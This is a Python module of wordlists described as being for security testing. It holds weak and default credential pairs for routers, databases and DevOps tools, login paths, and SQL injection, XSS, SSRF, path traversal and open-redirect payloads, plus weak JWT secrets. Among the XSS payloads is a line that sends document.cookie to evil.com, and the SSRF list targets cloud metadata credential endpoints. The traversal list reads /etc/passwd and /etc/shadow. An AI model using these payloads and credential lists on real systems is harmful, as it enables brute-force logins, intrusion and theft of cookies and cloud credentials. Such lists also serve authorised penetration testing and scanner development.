"""
Comprehensive wordlists for security testing.
Credentials, payloads, paths, user agents — production-grade coverage.
"""

USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Mobile/15E148 Safari/604.1",
    "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.64 Mobile Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 OPR/106.0.0.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "Dalvik/2.1.0 (Linux; U; Android 13; SM-S918B Build/TP1A.220624.014)",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Vivaldi/6.6.3271.50",
    "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "curl/8.5.0",
]

WEAK_CREDS = [

    ("admin",     ""),
    ("admin",     "admin"),
    ("admin",     "admin123"),
    ("admin",     "password"),
    ("admin",     "password1"),
    ("admin",     "Password1"),
    ("admin",     "Admin1234"),
    ("admin",     "12345"),
    ("admin",     "123456"),
    ("admin",     "1234567890"),
    ("admin",     "letmein"),
    ("admin",     "changeme"),
    ("admin",     "admin@123"),
    ("admin",     "adminadmin"),
    ("admin",     "test"),
    ("admin",     "root"),
    ("administrator", "administrator"),
    ("administrator", "admin"),
    ("administrator", "password"),
    ("administrator", ""),
    ("root",      "root"),
    ("root",      "toor"),
    ("root",      "password"),
    ("root",      "root123"),
    ("root",      ""),
    ("root",      "alpine"),
    ("root",      "raspberrypi"),
    ("test",      "test"),
    ("test",      "test123"),
    ("test",      "password"),
    ("guest",     "guest"),
    ("guest",     ""),
    ("user",      "user"),
    ("user",      "password"),
    ("demo",      "demo"),
    ("demo",      "password"),
    ("superuser", "superuser"),
    ("super",     "super"),
    ("operator",  "operator"),
    ("manager",   "manager"),
    ("support",   "support"),
    ("service",   "service"),
    ("webmaster", "webmaster"),
    ("info",      "info"),
    ("web",       "web"),
    ("ftp",       "ftp"),
    ("ftpuser",   "ftpuser"),
    ("anonymous", ""),
    ("anonymous", "anonymous"),

    ("admin",     "wordpress"),
    ("admin",     "joomla"),
    ("admin",     "drupal"),
    ("admin",     "magento"),
    ("admin",     "opencart"),

    ("admin",     "admin1234"),
    ("admin",     "1234"),
    ("admin",     "4321"),
    ("admin",     "admin4321"),
    ("cisco",     "cisco"),
    ("cisco",     "Cisco"),
    ("ubnt",      "ubnt"),
    ("pi",        "raspberry"),
    ("pi",        "pi"),
    ("vyos",      "vyos"),
    ("fortinet",  "fortigate"),
    ("admin",     "fortinet"),
    ("admin",     "sonicwall"),
    ("admin",     "synology"),
    ("admin",     "asusrouter"),
    ("admin",     "netgear"),
    ("admin",     "linksys"),
    ("admin",     "dlink"),
    ("admin",     "tplink"),
    ("Admin",     "Admin"),
    ("Admin",     "admin"),

    ("sa",        ""),
    ("sa",        "sa"),
    ("sa",        "password"),
    ("postgres",  "postgres"),
    ("mysql",     "mysql"),
    ("oracle",    "oracle"),
    ("mongodb",   ""),

    ("admin",     "cloud"),
    ("admin",     "Cloud1234!"),
    ("admin",     "Welcome1"),
    ("admin",     "Welcome@1"),
    ("admin",     "Passw0rd"),
    ("admin",     "P@ssw0rd"),
    ("admin",     "P@ssword1"),
    ("admin",     "P@$$w0rd"),
    ("admin",     "Aa123456"),

    ("admin",     "abc123"),
    ("admin",     "iloveyou"),
    ("admin",     "sunshine"),
    ("admin",     "princess"),
    ("admin",     "monkey"),
    ("admin",     "dragon"),
    ("admin",     "master"),
    ("admin",     "freedom"),
    ("admin",     "shadow"),
    ("admin",     "qwerty"),
    ("admin",     "qwerty123"),
    ("admin",     "superman"),
    ("admin",     "batman"),
    ("admin",     "trustno1"),

    ("admin",     "admin2023"),
    ("admin",     "admin2024"),
    ("admin",     "admin2025"),
    ("admin",     "Admin2024"),
    ("admin",     "Admin2024!"),
    ("admin",     "admin@2024"),
    ("admin",     "Admin@2024"),

    ("webadmin",  "webadmin"),
    ("webadmin",  "password"),
    ("sysadmin",  "sysadmin"),
    ("sysadmin",  "password"),
    ("devops",    "devops"),
    ("deploy",    "deploy"),
    ("jenkins",   "jenkins"),
    ("jenkins",   "password"),
    ("gitlab",    "gitlab"),
    ("sonar",     "sonar"),
    ("nexus",     "nexus"),
    ("kibana",    "kibana"),
    ("elastic",   "elastic"),
    ("grafana",   "grafana"),
    ("zabbix",    "zabbix"),
    ("nagios",    "nagios"),
    ("splunk",    "splunk"),
    ("redmine",   "redmine"),
    ("confluence","confluence"),
    ("jira",      "jira"),
]

AUTH_PATHS = [
    "/login", "/signin", "/sign-in", "/log-in", "/logon",
    "/auth", "/authenticate", "/authentication",
    "/admin", "/admin/", "/admin/login", "/admin/signin",
    "/administrator", "/administrator/login",
    "/wp-login.php", "/wp-admin", "/wp-admin/",
    "/user/login", "/users/login", "/users/sign_in",
    "/account/login", "/accounts/login",
    "/portal", "/portal/login",
    "/secure", "/secure/login",
    "/dashboard", "/dashboard/login",
    "/panel", "/panel/login", "/cpanel",
    "/webmail", "/roundcube", "/horde",
    "/phpmyadmin", "/phpmyadmin/",
    "/phpMyAdmin", "/phpMyAdmin/",
    "/pma", "/pma/",
    "/api/login", "/api/auth", "/api/v1/login",
    "/api/v1/auth", "/api/v1/authenticate",
    "/api/v2/login", "/api/v2/auth",
    "/api/token", "/api/auth/token",
    "/oauth/token", "/oauth2/token",
    "/rest/auth", "/rest/login",
    "/console", "/management", "/manage",
    "/manager", "/manager/html",
    "/jmx-console", "/web-console",
    "/solr", "/solr/admin",
    "/kibana", "/grafana", "/grafana/login",
    "/jenkins", "/jenkins/login",
    "/gitlab", "/gitlab/users/sign_in",
    "/gitea", "/gogs",
    "/nexus", "/nexus/index.html",
    "/sonar", "/sonarqube",
    "/zabbix", "/zabbix/index.php",
    "/nagios", "/nagios/",
    "/splunk", "/splunk/en-US/account/login",
    "/redmine", "/redmine/login",
    "/jira", "/confluence",
    "/wp/wp-login.php",
    "/blog/wp-login.php",
    "/wordpress/wp-login.php",
    "/cms/administrator",
    "/index.php/admin",
    "/backend",
    "/backoffice",
    "/siteadmin",
    "/site/admin",
    "/access",
    "/member/login",
    "/members/login",
    "/customer/account/login",
    "/user", "/users",
    "/connect/token",
    "/identity/connect/token",
    "/.well-known/openid-configuration",
]

SQLI_PAYLOADS = [

    ("'",                                              "error"),
    ('"',                                              "error"),
    ("\\",                                             "error"),
    ("1'",                                             "error"),
    ("1\"",                                            "error"),
    ("1`",                                             "error"),
    ("1'--",                                           "error"),
    ("1'-- -",                                         "error"),
    ("1' #",                                           "error"),

    ("1' AND 1=1--",                                   "blind"),
    ("1' AND 1=2--",                                   "blind"),
    ("1' OR 1=1--",                                    "error"),
    ("1' OR '1'='1",                                   "error"),
    ("' OR 1=1--",                                     "error"),
    ("' OR '1'='1'--",                                 "error"),
    ("admin'--",                                       "error"),
    ("admin'/*",                                       "error"),
    ("' OR 1=1#",                                      "error"),
    ("') OR ('1'='1",                                  "error"),
    ("' OR 'x'='x",                                    "error"),

    ("1 AND EXTRACTVALUE(1,CONCAT(0x7e,version()))",   "error"),
    ("1' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--", "error"),
    ("1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--", "error"),

    ("1' AND 1=CONVERT(int,'a')--",                    "error"),
    ("1' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--", "error"),

    ("1; SELECT SLEEP(5)--",                           "time"),
    ("1' AND SLEEP(5)--",                              "time"),
    ("1 AND SLEEP(5)",                                 "time"),
    ("' AND SLEEP(5)--",                               "time"),
    ("1' OR SLEEP(5)--",                               "time"),
    ("1; WAITFOR DELAY '0:0:5'--",                     "time"),
    ("'; WAITFOR DELAY '0:0:5'--",                     "time"),
    ("1'; WAITFOR DELAY '0:0:5'--",                    "time"),
    ("1 AND 1=1 AND SLEEP(5)",                         "time"),

    ("'; SELECT pg_sleep(5)--",                        "time"),
    ("1'; SELECT pg_sleep(5)--",                       "time"),

    ("' OR 1=1 AND ROWNUM=1--",                        "error"),
    ("1 AND 1=(SELECT 1 FROM DUAL WHERE 1=1 AND ROWNUM=1)", "error"),

    ("' UNION SELECT NULL--",                          "error"),
    ("' UNION SELECT NULL,NULL--",                     "error"),
    ("' UNION SELECT NULL,NULL,NULL--",                "error"),
    ("' UNION ALL SELECT NULL,NULL--",                 "error"),

    ("1; DROP TABLE--",                                "error"),
    ("'; INSERT INTO--",                               "error"),

    ("1'/**/OR/**/1=1--",                              "error"),
    ("1'%20OR%201=1--",                                "error"),
    ("1'+OR+1=1--",                                    "error"),
    ("1\\'OR 1=1--",                                   "error"),
    ("%27 OR %271%27=%271",                            "error"),
    ("1 /*!OR*/ 1=1--",                                "error"),
]

SQLI_ERRORS = [
    "sql syntax", "mysql_fetch", "mysql_num_rows", "mysql_query",
    "mysql error", "you have an error in your sql",
    "warning: mysql", "function.mysql",
    "ora-", "ora-00933", "ora-01756", "oracle error",
    "pg_query()", "pg_exec()", "unterminated quoted string",
    "psql error", "postgresql error",
    "sqlite_", "sqlite3_",
    "mssql", "sql server", "unclosed quotation mark",
    "supplied argument is not a valid mysql",
    "column count doesn't match", "syntax error",
    "invalid query", "db error", "database error",
    "sql error", "sql command not properly ended",
    "unexpected end of sql command",
    "invalid sql statement", "jdbc exception",
    "javax.persistence.persistenceexception",
    "hibernate", "sqlexception", "java.sql",
    "native error", "odbc sql", "odbc driver",
    "microsoft ole db", "error converting data type",
    "syntax error or access violation",
    "division by zero in sql", "invalid column name",
    "table or view does not exist",
    "sqlstate", "unknown column",
]

XSS_PAYLOADS = [

    ('<script>alert(1)</script>',                     "basic"),
    ('<script>alert("xss")</script>',                 "basic"),
    ('<script>alert(document.cookie)</script>',       "basic"),
    ('"><script>alert(1)</script>',                   "attr-break"),
    ("'><script>alert(1)</script>",                   "attr-break"),

    ('<img src=x onerror=alert(1)>',                  "event"),
    ('<img src=x onerror=alert(document.domain)>',    "event"),
    ('"><img src=x onerror=alert(1)>',                "attr-break"),
    ("'><img src=x onerror=alert(1)>",                "attr-break"),
    ('<body onload=alert(1)>',                        "event"),
    ('<svg onload=alert(1)>',                         "svg"),
    ('<svg/onload=alert(1)>',                         "svg"),
    ('<svg><script>alert(1)</script></svg>',           "svg"),
    ('<details open ontoggle=alert(1)>',              "event"),
    ('<input autofocus onfocus=alert(1)>',            "event"),
    ('<select onfocus=alert(1) autofocus>',           "event"),
    ('<video><source onerror=alert(1)>',              "event"),
    ('<iframe onload=alert(1)>',                      "event"),
    ('<object data=javascript:alert(1)>',             "obj"),

    ('javascript:alert(1)',                           "js-uri"),
    ('javascript:alert(document.cookie)',             "js-uri"),
    ('"><a href=javascript:alert(1)>click</a>',       "href"),

    ('<math><mi//xlink:href="javascript:alert(1)">',  "html5"),
    ('<table background="javascript:alert(1)">',      "html5"),

    ('<scr\x00ipt>alert(1)</scr\x00ipt>',             "bypass"),
    ('<scr\nipt>alert(1)</scr\nipt>',                 "bypass"),
    ('&#60;script&#62;alert(1)&#60;/script&#62;',     "entity"),
    ('%3Cscript%3Ealert(1)%3C%2Fscript%3E',           "url-encoded"),
    ('<SCRIPT>alert(1)</SCRIPT>',                     "case"),
    ('<ScRiPt>alert(1)</ScRiPt>',                     "case"),

    ('"><script src=//evil.com/x.js></script>',       "csp-bypass"),
    ('<script>fetch("https://evil.com?c="+document.cookie)</script>', "exfil"),

    ("'-alert(1)-'",                                  "dom"),
    ('"+alert(1)+"',                                  "dom"),
    ("javascript:/*--></title></style></textarea></script><script>alert(1)</script>", "polyglot"),

    ("{{7*7}}",                                       "ssti"),
    ("${7*7}",                                        "ssti"),
    ("<%= 7*7 %>",                                    "ssti"),
    ("#{7*7}",                                        "ssti"),
]

XSS_INDICATORS = [
    "<script>alert", "onerror=alert", "onload=alert",
    "javascript:alert", "<svg onload",
]

SSRF_PAYLOADS = [

    ("http://169.254.169.254/latest/meta-data/",                    "aws"),
    ("http://169.254.169.254/latest/meta-data/iam/security-credentials/", "aws"),
    ("http://169.254.169.254/latest/user-data",                     "aws"),
    ("http://169.254.169.254/latest/dynamic/instance-identity/document", "aws"),

    ("http://metadata.google.internal/computeMetadata/v1/",         "gcp"),
    ("http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", "gcp"),
    ("http://169.254.169.254/computeMetadata/v1/",                  "gcp"),

    ("http://169.254.169.254/metadata/instance?api-version=2021-02-01", "azure"),
    ("http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/", "azure"),

    ("http://169.254.169.254/metadata/v1/",                         "do"),

    ("http://localhost/",                                            "localhost"),
    ("http://127.0.0.1/",                                           "localhost"),
    ("http://127.0.0.1:80/",                                        "localhost"),
    ("http://127.0.0.1:8080/",                                      "localhost"),
    ("http://127.0.0.1:8443/",                                      "localhost"),
    ("http://127.0.0.1:443/",                                       "localhost"),
    ("http://[::1]/",                                               "localhost"),
    ("http://0.0.0.0/",                                             "localhost"),
    ("http://0x7f000001/",                                          "localhost"),
    ("http://2130706433/",                                          "localhost"),

    ("http://10.0.0.1/",                                            "internal"),
    ("http://10.0.0.1:8080/",                                       "internal"),
    ("http://192.168.1.1/",                                         "internal"),
    ("http://172.16.0.1/",                                          "internal"),

    ("http://localhost:6379/",                                      "redis"),
    ("dict://localhost:6379/info",                                  "redis"),
    ("http://localhost:11211/",                                     "memcached"),
    ("http://localhost:9200/",                                      "elasticsearch"),
    ("http://localhost:27017/",                                     "mongodb"),
    ("http://localhost:5432/",                                      "postgres"),
    ("http://localhost:3306/",                                      "mysql"),
    ("http://localhost:2181/",                                      "zookeeper"),
    ("http://localhost:4848/",                                      "glassfish"),
    ("http://localhost:8161/",                                      "activemq"),
    ("http://localhost:9090/",                                      "prometheus"),
    ("http://localhost:4040/",                                      "spark"),

    ("file:///etc/passwd",                                          "file"),
    ("file:///etc/shadow",                                          "file"),
    ("file:///etc/hosts",                                           "file"),
    ("file:///proc/self/environ",                                   "file"),
    ("file:///windows/win.ini",                                     "file"),
    ("file:///c:/windows/win.ini",                                  "file"),

    ("gopher://localhost:6379/_INFO",                               "gopher"),
    ("ldap://localhost:389/",                                       "ldap"),
    ("ftp://localhost:21/",                                         "ftp"),
]

SSRF_INDICATORS = [
    "ami-id", "instance-id", "instance-type", "local-ipv4",
    "meta-data", "computeMetadata", "latest/meta",
    "root:x:", "/bin/bash", "/bin/sh", "daemon:",
    "instanceId", "project-id", "service-accounts",
    "subscription", "resourceGroup", "vmId",
    "redis_version", "os_name", "tcp_port",
    "elasticsearch", "cluster_name", "number_of_nodes",
    "[boot loader]", "[extensions]",
    "WS_FTP", "Host User=",
]

TRAVERSAL_PAYLOADS = [

    ("../etc/passwd",                                     "linux"),
    ("../../etc/passwd",                                  "linux"),
    ("../../../etc/passwd",                               "linux"),
    ("../../../../etc/passwd",                            "linux"),
    ("../../../../../etc/passwd",                         "linux"),
    ("../../../../../../etc/passwd",                      "linux"),
    ("../../../../../../../etc/passwd",                   "linux"),

    ("..%2fetc%2fpasswd",                                 "linux"),
    ("%2e%2e%2fetc%2fpasswd",                             "linux"),
    ("%2e%2e/%2e%2e/etc/passwd",                          "linux"),
    ("..%252fetc%252fpasswd",                             "linux"),
    ("%252e%252e%252fetc%252fpasswd",                     "linux"),

    ("....//....//etc/passwd",                            "linux"),
    ("....\\\\....\\\\etc/passwd",                        "linux"),
    ("....//....//....//etc/passwd",                      "linux"),
    (".././.././etc/passwd",                              "linux"),

    ("../../../etc/passwd%00",                            "linux"),
    ("../../../etc/passwd%00.jpg",                        "linux"),

    ("../../../etc/shadow",                               "linux"),
    ("../../../etc/hosts",                                "linux"),
    ("../../../proc/self/environ",                        "linux"),
    ("../../../proc/version",                             "linux"),
    ("../../../var/log/apache2/access.log",               "linux"),
    ("../../../var/log/nginx/access.log",                 "linux"),

    ("..\\windows\\win.ini",                              "windows"),
    ("..\\..\\windows\\win.ini",                          "windows"),
    ("..\\..\\..\\windows\\win.ini",                      "windows"),
    ("..\\..\\..\\boot.ini",                              "windows"),

    ("..%5cwindows%5cwin.ini",                            "windows"),
    ("%2e%2e%5cwindows%5cwin.ini",                        "windows"),
    ("%2e%2e%5c%2e%2e%5cwindows%5cwin.ini",               "windows"),
    ("..\\/windows\\/win.ini",                            "windows"),
    ("..%c0%afwindows%c0%afwin.ini",                      "windows"),
]

TRAVERSAL_INDICATORS = [
    "root:x:", "daemon:", "nobody:", "bin:x:",
    "[boot loader]", "[extensions]", "[fonts]",
    "for 16-bit app support",
    "HTTP_USER_AGENT", "HTTP_HOST", "SERVER_NAME",
    "Linux version", "Darwin Kernel",
]

REDIRECT_PAYLOADS = [
    ("https://evil.com",                        "absolute"),
    ("//evil.com",                              "protocol-relative"),
    ("//evil.com/",                             "protocol-relative"),
    ("/\\evil.com",                             "backslash"),
    ("\\\\evil.com",                            "double-backslash"),
    ("https://evil.com%09",                     "tab"),
    ("https://evil.com%0d",                     "cr"),
    ("https://evil.com%0a",                     "lf"),
    ("https://evil.com%23",                     "hash"),
    ("https://evil.com%2f",                     "slash"),
    ("https://evil.com%3f",                     "question"),
    ("https://evil.com@target.com",             "at-sign"),
    ("https://target.com.evil.com",             "subdomain"),
    ("//evil%2ecom",                            "dot-encoded"),
    ("/%09/evil.com",                           "tab-path"),
    ("javascript://evil.com%0aalert(1)",        "js-uri"),
]

REDIRECT_PARAMS = {
    "url", "redirect", "redirect_to", "redirect_url",
    "next", "return", "return_url", "return_to",
    "goto", "go", "dest", "destination",
    "target", "to", "forward", "location",
    "continue", "ref", "href", "link",
    "callback", "cb", "out", "view",
    "u", "r", "returnto", "returnurl",
    "ReturnUrl", "Redirect", "redirectUrl",
}

FUZZ_PARAMS = [

    "id", "ID", "Id", "user_id", "userId", "account_id",
    "item_id", "product_id", "order_id", "post_id",
    "uid", "pid", "oid", "rid", "cid",

    "file", "filename", "path", "page", "include",
    "template", "view", "module", "doc", "document",
    "load", "download", "img", "image", "url",
    "src", "href", "redirect", "link", "location",

    "q", "query", "search", "keyword", "s",
    "filter", "sort", "order", "limit", "offset",
    "category", "tag", "type", "format", "lang",

    "token", "api_key", "apikey", "key", "auth",
    "access_token", "session", "sid", "csrf",
    "code", "state", "nonce",

    "name", "username", "email", "message", "comment",
    "content", "text", "body", "data", "value",
    "title", "description", "subject",

    "cmd", "command", "exec", "execute", "shell",
    "ping", "host", "ip", "port", "server",
    "debug", "trace", "verbose", "log",

    "action", "controller", "method", "function",
    "param", "var", "arg", "args",
    "input", "output", "return", "next", "prev",
    "from", "to", "start", "end", "begin",
    "date", "time", "year", "month",
    "format", "mode", "style", "theme", "skin",
    "lang", "locale", "language", "region",
    "version", "v", "ver", "rev",
    "callback", "cb", "jsonp",
    "ref", "referer", "source",
    "category_id", "parent_id", "group_id",
    "feed", "rss", "xml", "json",
]

JWT_WEAK_SECRETS = [
    "secret", "password", "123456", "qwerty",
    "changeme", "default", "admin", "key",
    "private", "jwt_secret", "jwt-secret",
    "supersecret", "yoursecretkey", "mysecretkey",
    "hs256", "hmac", "signature", "token",
    "your-256-bit-secret", "your-secret-key",
    "myjwtsecret", "secretkey", "jwttoken",
    "", "null", "undefined", "none",
    "development", "production", "staging",
    "test", "testing", "demo",
]
